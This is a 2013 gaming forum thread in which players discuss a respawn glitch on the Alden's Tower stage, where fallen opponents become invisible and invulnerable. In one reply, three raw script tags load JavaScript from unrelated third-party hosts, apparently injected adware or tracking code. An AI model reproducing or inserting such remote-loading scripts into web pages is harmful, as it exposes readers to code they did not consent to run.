Feb 10 2013
By: Danyuro Lombax Warrior 91 posts

Alden's Tower

8 replies 272 views Edited Feb 10, 2013

There is something that is bugging me lately about this level. Everyone know that this level scrolls upwards. If players are left behind, they will vanish into the pit and respawn back into a higher level of the stage. This will stun the opponent and make them lose AP.

But this mechanic is not working for me.

Every time I play this level and someone falls into the pit, they disappear. They won’t spawn back into a higher level of the stage. I can't hit them, I can't kill them, hell I can’t even see them. When the stun period is over, they magically reappear into the stage and haven't loss any AP.

Anyone else noticed this problem? Is it a glitch? It is kind of annoying, especially in high level matches, because it is basically a free teleport.

Message 1 of 9 (272 Views)
Hekseville Citizen
396 posts

Re: Alden's Tower

Feb 10, 2013
I've never heard anyone have this problem.
Yeah, it's definitely a glitch.
Unless, they spawn a level below you and it's looks like they aren't there when they really are.
Besides that, yea, it's a glitch.
----------------------------------------------------------------------------------------------------------

Do you play LBP2? If so, could you take the time to check out my levels?
Check out my LBP.ME
Message 2 of 9 (240 Views)
0 Likes
Gaming Beast
1776 posts

[ Edited ]
Feb 10, 2013

I've defitinely seen something like this before.

I'd be on Alden's Tower, a player would fall off, but they wouldn't reappear stunned. Instead, they'd kind of just stay down there for a while, then I would hear the death blast sound (the sound that you hear when you kill someone) and they'd respawn as if they had gotten killed. I'm not sure if that counts as a kill or not. 

I'm not sure if this is a glitch, but I remember seeing footage of it during a live demo. Is this what you're experiencing?

This is exactly what happened to me (keep your eye on Jak, Yellow P4)

If the video for some reason doesn't work as it should, skip to 1:16:53.

Message 3 of 9 (210 Views)
0 Likes
Lombax Warrior
91 posts

Feb 10, 2013

I know what you're talking about., but I mentioned something different. If a player falls into the pit and then again immediately falls down, he will be killed. That is no glitch, I think it supposed to be like that.

What I experienced was something different. When someone falls down, they don't respawn at all. Normally they will be teleported to another section of the stage. But sometimes it doesn't show the player. So basically the person had been teleported, but isn’t reappearing in the match. He doesn’t lose a life, or lose AP, he is just invisible.

It’s kinda random too, sometimes it works perfect and sometimes it glitches.

Message 4 of 9 (191 Views)
0 Likes
Gaming Beast
2167 posts

Feb 10, 2013
I've had this same thing, moreso since the last patch. It's really annoying because I know they respawned on the stage but I can't take advantage of it since I can't see them.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 5 of 9 (158 Views)
0 Likes
Lombax Warrior
233 posts

Feb 10, 2013
I've also noticed Carmelita will say the same thing multiple times in various voices...was that intended? Cuz it's a bit annoying.
Message 6 of 9 (131 Views)
0 Likes
Hekseville Citizen
385 posts

Feb 10, 2013
Theyve always been invisible for me, Ive even started attacking them while theyre invisible and nothing happens, theyre also invulnerable while stunned. This doesnt happen to everyone consistently?
December 11th 2012: Went 12-0 ranked FFA. (Jak)
December 13th 2012: Went 8-0 Stock Unranked FFA. (Jak)
January 10th 2013: Sniped Asis_aka_talent into Jak's lvl 1. (Uncle Radec)
April 16th 2013: Caught parappa's lvl 2 with Sweet Tooth's lvl 1 and didn't die in the process (Sweet Tooth)
May 5th 2013: Got my Radec eviscerated by whaatxddd's radec in 1v1. Kmart, u better watch out.
Just learnt "Drake" and is now learning "Nariko".
Message 7 of 9 (130 Views)
0 Likes
Wastelander
810 posts

Feb 10, 2013
Sometimes I self-destruct. Smiley Sad
**bleep**?
Message 8 of 9 (118 Views)
0 Likes
Highlighted
Lombax Warrior
91 posts

Feb 11, 2013

I see that the are more gamers with the same problem. Hopefully someone on the development team will notice this topic so they can look into the problem.

Message 9 of 9 (77 Views)
0 Likes